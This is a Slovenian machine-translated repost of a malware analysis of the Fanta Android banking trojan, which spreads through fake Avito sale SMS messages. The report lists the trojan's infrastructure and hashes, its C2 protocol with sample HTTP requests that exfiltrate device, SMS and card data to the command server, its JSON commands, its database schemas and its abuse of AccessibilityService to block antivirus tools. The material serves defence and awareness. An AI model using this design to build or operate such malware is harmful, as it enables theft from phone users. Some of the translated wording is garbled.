ProHoster > Blog > internetne novice > Leisya, Fanta: nova taktika starega trojanca Android

Leisya, Fanta: nova taktika starega trojanca Android

Leisya, Fanta: nova taktika starega trojanca Android

Nekega dne želite nekaj prodati na Avitu in, ko objavite podroben opis svojega izdelka (na primer modul RAM), boste prejeli to sporočilo:

Leisya, Fanta: nova taktika starega trojanca AndroidKo odprete povezavo, boste videli na videz neškodljivo stran, ki vas, srečnega in uspešnega prodajalca, obvesti, da je bil nakup opravljen:

Leisya, Fanta: nova taktika starega trojanca Android
Ko kliknete gumb »Nadaljuj«, bo datoteka APK z ikono in imenom, ki vzbuja zaupanje, prenesena v vašo napravo Android. Namestili ste aplikacijo, ki je iz neznanega razloga zahtevala AccessibilityService pravice, potem se je pojavilo nekaj oken in hitro izginilo in ... To je to.

Greste preverit svoje stanje, vendar vaša bančna aplikacija iz neznanega razloga znova zahteva podatke o kartici. Po vnosu podatkov se zgodi nekaj strašnega: denar iz neznanega razloga začne izginjati z vašega računa. Poskušate rešiti težavo, vendar se vaš telefon upira: pritisne tipki »Nazaj« in »Domov«, se ne izklopi in vam ne dovoli aktivirati nobenih varnostnih ukrepov. Posledično ostanete brez denarja, vaše blago ni bilo kupljeno, zmedeni ste in se sprašujete: kaj se je zgodilo?

Odgovor je preprost: postali ste žrtev Android trojanca Fanta, člana družine Flexnet. Kako se je to zgodilo? Razložimo zdaj.

Avtorji: Andrej Polovinkin, mlajši specialist za analizo škodljivih programov, Ivan Pisarev, specialist za analizo zlonamerne programske opreme.

Nekaj ​​statistike

Družina trojanskih programov Android Flexnet je prvič postala znana leta 2015. V dokaj dolgem obdobju delovanja se je družina razširila na več podvrst: Fanta, Limebot, Lipton itd. Trojanec in z njim povezana infrastruktura ne mirujeta: razvijajo se nove učinkovite distribucijske sheme - v našem primeru visokokakovostne lažne strani, namenjene določenemu uporabniku-prodajalcu, razvijalci trojanca pa sledijo modnim trendom v pisanje virusov - dodajanje nove funkcionalnosti, ki omogoča učinkovitejšo krajo denarja iz okuženih naprav in obide zaščitne mehanizme.

Kampanja, opisana v tem članku, je namenjena uporabnikom iz Rusije, manjše število okuženih naprav so zabeležili v Ukrajini, še manj pa v Kazahstanu in Belorusiji.

Čeprav je Flexnet v areni Android Trojan že več kot 4 leta in so ga podrobno preučevali številni raziskovalci, je še vedno v dobri formi. Od januarja 2019 je možna škoda več kot 35 milijonov rubljev - in to samo za akcije v Rusiji. Leta 2015 so se različne različice tega Android Trojanca prodajale na podtalnih forumih, kjer je bilo mogoče najti tudi izvorno kodo Trojanca s podrobnim opisom. To pomeni, da je statistika škode v svetu še bolj impresivna. Ni slab pokazatelj za tako starega človeka, kajne?

Leisya, Fanta: nova taktika starega trojanca Android

Od prodaje do zavajanja

Kot je razvidno iz prej predstavljenega posnetka zaslona phishing strani za internetno storitev za objavo oglasov Avito, je bila ta pripravljena za točno določeno žrtev. Očitno napadalci uporabljajo enega od Avitovih razčlenjevalcev, ki izvleče telefonsko številko in ime prodajalca ter opis izdelka. Po razširitvi strani in pripravi datoteke APK žrtev prejme SMS z njegovim imenom in povezavo do phishing strani, ki vsebuje opis njegovega izdelka in znesek, prejet od »prodaje« izdelka. S klikom na gumb uporabnik prejme zlonamerno APK datoteko - Fanta.

Študija domene shcet491[.]ru je pokazala, da je delegirana na Hostingerjeve strežnike DNS:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

Datoteka domenskega območja vsebuje vnose, ki kažejo na naslove IP 31.220.23[.]236, 31.220.23[.]243 in 31.220.23[.]235. Vendar zapis primarnega vira domene (zapis A) kaže na strežnik z naslovom IP 178.132.1[.]240.

IP naslov 178.132.1[.]240 se nahaja na Nizozemskem in pripada gostitelju WorldStream. IP naslovi 31.220.23[.]235, 31.220.23[.]236 in 31.220.23[.]243 se nahajajo v Združenem kraljestvu in pripadajo strežniku za skupno gostovanje HOSTINGER. Uporablja se kot snemalnik openprov-ru. Na naslov IP 178.132.1[.]240 so se razrešile tudi naslednje domene:

  • sdelka-ru[.]ru
  • tovar-av[.]ru
  • av-tovar[.]ru
  • ru-sdelka[.]ru
  • shcet382[.]ru
  • sdelka221[.]ru
  • sdelka211[.]ru
  • vyplata437[.]ru
  • viplata291[.]ru
  • perevod273[.]ru
  • perevod901[.]ru

Upoštevati je treba, da so bile povezave v naslednji obliki na voljo s skoraj vseh domen:

http://(www.){0,1}<%domain%>/[0-9]{7}

Ta predloga vključuje tudi povezavo iz sporočila SMS. Na podlagi zgodovinskih podatkov je bilo ugotovljeno, da ena domena ustreza več povezavam v zgoraj opisanem vzorcu, kar kaže, da je bila ena domena uporabljena za distribucijo trojanca več žrtvam.

Skočimo malo naprej: trojanec, prenesen prek povezave iz SMS-a, uporablja naslov kot nadzorni strežnik onusedseddohap[.]klub. Ta domena je bila registrirana 2019-03-12, od 2019-04-29 pa so aplikacije APK komunicirale s to domeno. Na podlagi podatkov, pridobljenih iz VirusTotal, je skupno 109 aplikacij sodelovalo s tem strežnikom. Domena se je sama razrešila na naslov IP 217.23.14[.]27, ki se nahaja na Nizozemskem in je v lasti gostitelja WorldStream. Uporablja se kot snemalnik imenik. Na ta naslov IP so bile razrešene tudi domene bad-racoon[.]club (začenši od 2018) in bad-racoon[.]v živo (od 2018). Z domeno bad-racoon[.]club interakcija z več kot 80 datotekami APK bad-racoon[.]v živo - več kot 100.

Na splošno napad napreduje na naslednji način:

Leisya, Fanta: nova taktika starega trojanca Android

Kaj je pod pokrovom Fante?

Kot mnogi drugi trojanci za Android lahko tudi Fanta bere in pošilja sporočila SMS, postavlja zahteve USSD in prikazuje lastna okna na vrhu aplikacij (vključno z bančnimi). Vendar pa je prišel arzenal funkcionalnosti te družine: Fanta je začela uporabljati AccessibilityService za različne namene: branje vsebine obvestil iz drugih aplikacij, preprečevanje zaznave in zaustavitev izvajanja trojanca na okuženi napravi itd. Fanta deluje na vseh različicah Androida, ki niso mlajši od 4.4. V tem članku si bomo podrobneje ogledali naslednji vzorec Fante:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Takoj po izstrelitvi

Takoj po zagonu trojanec skrije svojo ikono. Aplikacija lahko deluje le, če imena okužene naprave ni na seznamu:

  • android_x86
  • VirtualBox
  • Nexus 5X (bullhead)
  • Nexus 5 (brivnica)

To preverjanje se izvede v glavni storitvi trojanca - MainService. Ob prvem zagonu se konfiguracijski parametri aplikacije inicializirajo na privzete vrednosti (format za shranjevanje konfiguracijskih podatkov in njihov pomen bomo obravnavali kasneje), nova okužena naprava pa se registrira na nadzornem strežniku. Na strežnik bo poslana zahteva HTTP POST z vrsto sporočila register_bot in informacije o okuženi napravi (različica Androida, IMEI, telefonska številka, ime operaterja in koda države, v kateri je operater registriran). Naslov služi kot nadzorni strežnik hXXp://onuseseddohap[.]club/controller.php. V odgovor strežnik pošlje sporočilo, ki vsebuje polja bot_id, bot_pwd, strežnik — aplikacija te vrednosti shrani kot parametre strežnika CnC. Parameter strežnik neobvezno, če polje ni bilo prejeto: Fanta uporablja naslov registracije - hXXp://onuseseddohap[.]club/controller.php. Funkcijo spreminjanja naslova CnC lahko uporabimo za reševanje dveh težav: za enakomerno porazdelitev obremenitve med več strežnikov (če je okuženih naprav veliko, je lahko obremenitev neoptimiziranega spletnega strežnika velika) in tudi za uporabo alternativni strežnik v primeru okvare enega od CnC strežnikov.

Če med pošiljanjem zahteve pride do napake, bo trojanec po 20 sekundah ponovil postopek registracije.

Ko je naprava uspešno registrirana, bo Fanta uporabniku prikazala naslednje sporočilo:

Leisya, Fanta: nova taktika starega trojanca Android
Pomembna opomba: klicana služba Varnost sistema — ime trojanske storitve in po kliku na gumb ОК Odpre se okno z nastavitvami dostopnosti okužene naprave, kjer mora uporabnik zlonamerni storitvi dodeliti pravice dostopnosti:

Leisya, Fanta: nova taktika starega trojanca Android
Takoj ko se uporabnik vklopi AccessibilityService, Fanta pridobi dostop do vsebine oken aplikacij in dejanj, izvedenih v njih:

Leisya, Fanta: nova taktika starega trojanca Android
Trojanec takoj po prejemu pravic dostopnosti zahteva skrbniške pravice in pravice za branje obvestil:

Leisya, Fanta: nova taktika starega trojanca Android
S storitvijo AccessibilityService aplikacija simulira pritiske na tipke in si tako podeli vse potrebne pravice.

Fanta ustvari več primerkov baze podatkov (ki bodo opisani kasneje), potrebnih za shranjevanje konfiguracijskih podatkov in informacij, zbranih v procesu o okuženi napravi. Za pošiljanje zbranih informacij trojanec ustvari ponavljajočo se nalogo, namenjeno prenosu polj iz baze podatkov in prejemu ukaza od nadzornega strežnika. Interval za dostop do CnC je nastavljen glede na različico Androida: v primeru 5.1 bo interval 10 sekund, sicer 60 sekund.

Za prejem ukaza Fanta poda zahtevo GetTask na strežnik za upravljanje. V odgovor lahko CnC pošlje enega od naslednjih ukazov:

Ekipa Opis
0 Pošlji SMS sporočilo
1 Opravite telefonski klic ali ukaz USSD
2 Posodobi parameter Interval
3 Posodobi parameter prestrezanje
6 Posodobi parameter smsManager
9 Začnite zbirati SMS sporočila
11 Ponastavite telefon na tovarniške nastavitve
12 Omogoči/onemogoči beleženje ustvarjanja pogovornega okna

Fanta zbira tudi obvestila iz 70 bančnih aplikacij, hitrih plačilnih sistemov in e-denarnic ter jih shranjuje v bazi podatkov.

Shranjevanje konfiguracijskih parametrov

Za shranjevanje konfiguracijskih parametrov Fanta uporablja standardni pristop za platformo Android - Preferences-datoteke. Nastavitve bodo shranjene v datoteko z imenom nastavitve. Opis shranjenih parametrov je v spodnji tabeli.

ime Privzeta vrednost Možne vrednosti Opis
id 0 Integer ID bota
strežnik hXXp://onuseseddohap[.]club/ URL Nadzorni naslov strežnika
osebi - String Geslo strežnika
Interval 20 Integer Časovni interval. Označuje, kako dolgo je treba odložiti naslednje naloge:

  • Pri pošiljanju povpraševanja o statusu poslanega SMS sporočila
  • Prejemanje novega ukaza s strežnika za upravljanje
prestrezanje vse vse/telŠtevilka Če je polje enako nizu vse ali telŠtevilka, bo aplikacija prestregla prejeto sporočilo SMS in ga uporabniku ne bo prikazala
smsManager 0 0/1 Omogoči/onemogoči aplikacijo kot privzetega prejemnika SMS-a
readDialog false Pravilno napačno Omogoči/onemogoči beleženje dogodkov AccessibilityEvent

Datoteko uporablja tudi Fanta smsManager:

ime Privzeta vrednost Možne vrednosti Opis
pckg - String Ime uporabljenega upravitelja SMS sporočil

Interakcija z bazami podatkov

Med svojim delovanjem trojanec uporablja dve podatkovni bazi. Baza podatkov imenovana a uporablja se za shranjevanje različnih informacij, zbranih iz telefona. Druga zbirka podatkov je poimenovana fanta.db in se uporablja za shranjevanje nastavitev, odgovornih za ustvarjanje lažnih oken, namenjenih zbiranju informacij o bančnih karticah.

Trojanec uporablja bazo podatkov а za shranjevanje zbranih informacij in beleženje vaših dejanj. Podatki so shranjeni v tabeli dnevniki. Če želite ustvariti tabelo, uporabite naslednjo poizvedbo SQL:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Baza podatkov vsebuje naslednje informacije:

1. Beleženje zagona okužene naprave s sporočilom Telefon je vklopljen!

2. Obvestila iz aplikacij. Sporočilo je ustvarjeno po naslednji predlogi:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Podatki bančne kartice iz obrazcev za lažno predstavljanje, ki jih je ustvaril trojanec. Parameter VIEW_NAME je lahko eno od naslednjega:

  • AliExpress
  • Avito
  • Google Play
  • Razno <%App Name%>

Sporočilo se zabeleži v formatu:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Dohodna/odhodna SMS sporočila v obliki:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Informacije o paketu, ki ustvari pogovorno okno v formatu:

(<%Package name%>)<%Package information%>

Primer tabele dnevniki:

Leisya, Fanta: nova taktika starega trojanca Android
Ena izmed funkcionalnosti Fante je zbiranje informacij o bančnih karticah. Zbiranje podatkov poteka z ustvarjanjem lažnih oken ob odpiranju bančnih aplikacij. Trojanec ustvari okno za lažno predstavljanje samo enkrat. Podatek, da je bilo okno prikazano uporabniku, je shranjen v tabeli nastavitve v zbirki podatkov fanta.db. Če želite ustvariti bazo podatkov, uporabite naslednjo poizvedbo SQL:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Vsa polja tabele nastavitve privzeto inicializirano na 1 (ustvari okno za lažno predstavljanje). Ko uporabnik vnese svoje podatke, bo vrednost nastavljena na 0. Primer polj tabele nastavitve:

  • can_login — polje je odgovorno za prikaz obrazca pri odpiranju bančne aplikacije
  • prva_banka - se ne uporablja
  • can_avito — polje je odgovorno za prikaz obrazca pri odpiranju aplikacije Avito
  • can_ali — polje je odgovorno za prikaz obrazca pri odpiranju aplikacije Aliexpress
  • lahko_drugo — polje je odgovorno za prikaz obrazca pri odpiranju katere koli aplikacije s seznama: Yula, Pandao, Drom Auto, Denarnica. Kartice s popusti in bonusi, Aviasales, Booking, Trivago
  • can_card — polje je odgovorno za prikaz obrazca ob odpiranju Google Play

Interakcija s strežnikom za upravljanje

Omrežna interakcija s strežnikom za upravljanje poteka prek protokola HTTP. Za delo z omrežjem Fanta uporablja priljubljeno knjižnico Retrofit. Zahteve se pošiljajo na: hXXp://onuseseddohap[.]club/controller.php. Naslov strežnika lahko spremenite ob registraciji na strežnik. Piškotki se lahko pošljejo kot odgovor s strežnika. Fanta pošlje naslednje zahteve strežniku:

  • Registracija bota na nadzornem strežniku se zgodi enkrat, ob prvem zagonu. Strežniku se pošljejo naslednji podatki o okuženi napravi:
    · Piškotek — piškotki, prejeti s strežnika (privzeta vrednost je prazen niz)
    · Način — konstanta niza register_bot
    · predpono — celoštevilska konstanta 2
    · različica_sdk — se oblikuje po naslednji predlogi: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
    · IMEI — IMEI okužene naprave
    · država — šifra države, v kateri je upravljavec registriran, v formatu ISO
    · Številka - telefonska številka
    · operater — ime operaterja

    Primer zahteve, poslane strežniku:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>

    V odgovor na zahtevo mora strežnik vrniti objekt JSON, ki vsebuje naslednje parametre:
    · bot_id — ID okužene naprave. Če je bot_id enak 0, bo Fanta znova izvedla zahtevo.
    bot_pwd — geslo za strežnik.
    strežnik — naslov nadzornega strežnika. Izbirni parameter. Če parameter ni naveden, bo uporabljen naslov, shranjen v aplikaciji.

    Primer predmeta JSON:

    {
    "response":[
   	 {
   		 "bot_id": <%BOT_ID%>,
   		 "bot_pwd": <%BOT_PWD%>,
   		 "server": <%SERVER%>
   	 }
    ],
    "status":"ok"
}

  • Zahteva za prejem ukaza s strežnika. Strežniku se pošljejo naslednji podatki:
    · Piškotek — piškotke, prejete s strežnika
    · Ponudba — ID okužene naprave, ki je bil prejet ob pošiljanju zahteve register_bot
    · osebi — geslo za strežnik
    · divice_admin — polje določa, ali so bile pridobljene skrbniške pravice. Če so bile pridobljene skrbniške pravice, je polje enako 1, drugače 0
    · Dostopnost — Stanje delovanja storitve dostopnosti. Če je bila storitev zagnana, je vrednost 1, drugače 0
    · SMSManager — prikazuje, ali je trojanec omogočen kot privzeta aplikacija za prejemanje SMS-ov
    · zaslon — prikaže, v kakšnem stanju je zaslon. Vrednost bo nastavljena 1, če je zaslon prižgan, sicer 0;

    Primer zahteve, poslane strežniku:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    Odvisno od ukaza lahko strežnik vrne objekt JSON z različnimi parametri:

    · Ekipa Pošlji SMS sporočilo: Parametri vsebujejo telefonsko številko, besedilo SMS sporočila in ID poslanega sporočila. Identifikator se uporablja pri pošiljanju sporočila strežniku z vrsto setSmsStatus. 

    {
    "response":
    [
   	 {
   		 "mode": 0,
   		 "sms_number": <%SMS_NUMBER%>,
   		 "sms_text": <%SMS_TEXT%>,
   		 "sms_id": %SMS_ID%
   	 }
    ],
    "status":"ok"
}

    · Ekipa Opravite telefonski klic ali ukaz USSD: Telefonska številka ali ukaz je v telesu odgovora. 

    {
    "response":
    [
   	 {
   		 "mode": 1,
   		 "command": <%TEL_NUMBER%>
   	 }
    ],
    "status":"ok"
}

    · Ekipa Spremenite parameter intervala. 

    {
    "response":
    [
   	 {
   		 "mode": 2,
   		 "interval": <%SECONDS%>
   	 }
    ],
    "status":"ok"
}

    · Ekipa Spremenite parameter prestrezanja. 

    {
    "response":
    [
   	 {
   		 "mode": 3,
   		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
   	 }
    ],
    "status":"ok"
}

    · Ekipa Spremenite polje SmsManager. 

    {
    "response":
    [
   	 {
   		 "mode": 6,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

    · Ekipa Zbirajte SMS sporočila iz okužene naprave.

    {
    "response":
    [
   	 {
   		 "mode": 9
   	 }
    ],
    "status":"ok"
}

    · Ekipa Ponastavite telefon na tovarniške nastavitve: 

    {
    "response":
    [
   	 {
   		 "mode": 11
   	 }
    ],
    "status":"ok"
}

    · Ekipa Spremenite parameter ReadDialog. 

    {
    "response":
    [
   	 {
   		 "mode": 12,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

  • Pošiljanje sporočila z vrsto setSmsStatus. Ta zahteva se izvede po izvedbi ukaza Pošlji SMS sporočilo. Zahteva izgleda takole:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • Nalaganje vsebine baze podatkov. Ena vrstica se prenese na zahtevo. Strežniku se pošljejo naslednji podatki:
    · Piškotek — piškotke, prejete s strežnika
    · Način — konstanta niza setSaveInboxSms
    · Ponudba — ID okužene naprave, ki je bil prejet ob pošiljanju zahteve register_bot
    · besedilo — besedilo v trenutnem zapisu baze podatkov (polje d iz mize dnevniki v zbirki podatkov а)
    · Številka — ime trenutnega zapisa baze podatkov (polje p iz mize dnevniki v zbirki podatkov а)
    · sms_mode — cela vrednost (polje m iz mize dnevniki v zbirki podatkov а)

    Zahteva izgleda takole:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    Če je bila vrstica uspešno poslana na strežnik, bo vrstica izbrisana iz tabele. Primer predmeta JSON, ki ga vrne strežnik:

    {
    "response":[],
    "status":"ok"
}

Interakcija s storitvijo AccessibilityService

AccessibilityService je bil implementiran za lažjo uporabo naprav Android za ljudi s posebnimi potrebami. V večini primerov je za interakcijo z aplikacijo potrebna fizična interakcija. AccessibilityService vam omogoča, da jih naredite programsko. Fanta uporablja storitev za ustvarjanje lažnih oken v bančnih aplikacijah in uporabnikom preprečuje odpiranje sistemskih nastavitev in nekaterih aplikacij.

S pomočjo funkcionalnosti AccessibilityService trojanec spremlja spremembe elementov na zaslonu okužene naprave. Kot je bilo že opisano, nastavitve Fanta vsebujejo parameter, ki je odgovoren za operacije beleženja s pogovornimi okni - readDialog. Če je ta parameter nastavljen, bodo podatki o imenu in opisu paketa, ki je sprožil dogodek, dodani v bazo podatkov. Trojanec ob sprožitvi dogodkov izvede naslednja dejanja:

  • Simulira pritisk tipk za nazaj in domov v naslednjih primerih:
    · če želi uporabnik znova zagnati svojo napravo
    · če želi uporabnik izbrisati aplikacijo “Avito” ali spremeniti pravice dostopa
    · če je na strani omenjena aplikacija “Avito”.
    · ko odprete aplikacijo Google Play Protect
    · pri odpiranju strani z nastavitvami AccessibilityService
    · ko se prikaže pogovorno okno Varnost sistema
    · pri odpiranju strani z nastavitvijo »Risanje čez drugo aplikacijo«.
    · ko odprete stran »Aplikacije«, »Obnovitev in ponastavitev«, »Ponastavitev podatkov«, »Ponastavitev nastavitev«, »Razvijalska plošča«, »Posebno. priložnosti«, »Posebne priložnosti«, »Posebne pravice«
    · če je dogodek ustvarila določena aplikacija.

    Seznam aplikacij

    • Android
    • Master Lite
    • Clean Master
    • Clean Master za procesor x86
    • Meizu Application Permission Management
    • Varnost MIUI
    • Clean Master - Antivirus & Cache in Garbage Cleaner
    • Starševski nadzor in GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock & Web Security Beta
    • Čistilec virusov, protivirusni program, čistilec (MAX Security)
    • Mobile AntiVirus Security PRO
    • Protivirusni program Avast in brezplačna zaščita 2019
    • Mobilna varnost MegaFon
    • Zaščita AVG za Xperia
    • Mobilna varnost
    • Protivirusna zaščita Malwarebytes
    • Protivirusni program za Android 2019
    • Security Master - Antivirus, VPN, AppLock, Booster
    • Protivirusni program AVG za tablico Huawei System Manager
    • Dostopnost Samsung
    • Samsung Smart Manager
    • Mojster varnosti
    • Hitro povečanje hitrosti
    • dr.web
    • Varnostni prostor Dr.Web
    • Mobilni nadzorni center Dr.Web
    • Dr.Web Security Space Life
    • Mobilni nadzorni center Dr.Web
    • Protivirusna in mobilna varnost
    • Kaspersky Internet Security: protivirusna zaščita in zaščita
    • Kaspersky Battery Life: Saver & Booster
    • Kaspersky Endpoint Security – zaščita in upravljanje
    • AVG Antivirus free 2019 – Zaščita za Android
    • Android Antivirus
    • Norton Mobile Security in protivirusni program
    • Antivirus, požarni zid, VPN, mobilna varnost
    • Mobile Security: antivirus, VPN, zaščita pred krajo
    • Antivirus za Android

  • Če je pri pošiljanju SMS sporočila na kratko številko zahtevano dovoljenje, Fanta simulira klik na potrditveno polje Zapomni si izbiro in gumb poslati.
  • Ko poskušate trojancu odvzeti skrbniške pravice, zaklene zaslon telefona.
  • Preprečuje dodajanje novih skrbnikov.
  • Če je protivirusna aplikacija dr.web zaznal grožnjo, Fanta oponaša pritisk na gumb ignorirati.
  • Trojanec simulira pritisk gumba za nazaj in domov, če je dogodek ustvarila aplikacija Samsung Device Care.
  • Fanta ustvari phishing okna z obrazci za vnos podatkov o bančnih karticah, če je bila zagnana aplikacija s seznama približno 30 različnih internetnih storitev. Med njimi: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto itd.

    Obrazci za lažno predstavljanje

    Fanta analizira, katere aplikacije se izvajajo na okuženi napravi. Če je bila odprta aplikacija, ki vas zanima, trojanec poleg vseh drugih prikaže okno za lažno predstavljanje, ki je obrazec za vnos podatkov o bančni kartici. Uporabnik mora vnesti naslednje podatke:

    • Številka kartice
    • Datum poteka kartice
    • CVV
    • Ime imetnika kartice (ne za vse banke)

    Odvisno od zagnane aplikacije bodo prikazana različna okna za lažno predstavljanje. Spodaj so primeri nekaterih od njih:

    AliExpress:

    Leisya, Fanta: nova taktika starega trojanca Android
    Avito:

    Leisya, Fanta: nova taktika starega trojanca Android
    Za nekatere druge aplikacije, npr. Google Play Market, Aviasales, Pandao, Booking, Trivago:
    Leisya, Fanta: nova taktika starega trojanca Android

    Kako je res bilo

    Na srečo se je izkazalo, da je oseba, ki je prejela SMS sporočilo, opisano na začetku članka, specialist za kibernetsko varnost. Zato se resnična, nerežiserjeva različica razlikuje od prej povedane: oseba je prejela zanimiv SMS, nakar ga je dala skupini Group-IB Threat Hunting Intelligence. Rezultat napada je ta članek. Srečen konec, kajne? Vse zgodbe pa se ne končajo tako uspešno in da vaša ne bo videti kot režiserski posnetek z izgubo denarja, je v večini primerov dovolj, da se držite naslednjih že dolgo opisanih pravil:

    • ne nameščajte aplikacij za mobilno napravo z operacijskim sistemom Android iz drugih virov razen Google Play
    • Pri nameščanju aplikacije bodite posebno pozorni na pravice, ki jih zahteva aplikacija
    • bodite pozorni na končnice prenesenih datotek
    • redno nameščajte posodobitve OS Android
    • ne obiskujte sumljivih virov in ne prenašajte datotek od tam
    • Ne klikajte na povezave, prejete v SMS sporočilih.

Vir: www.habr.com

Dodaj komentar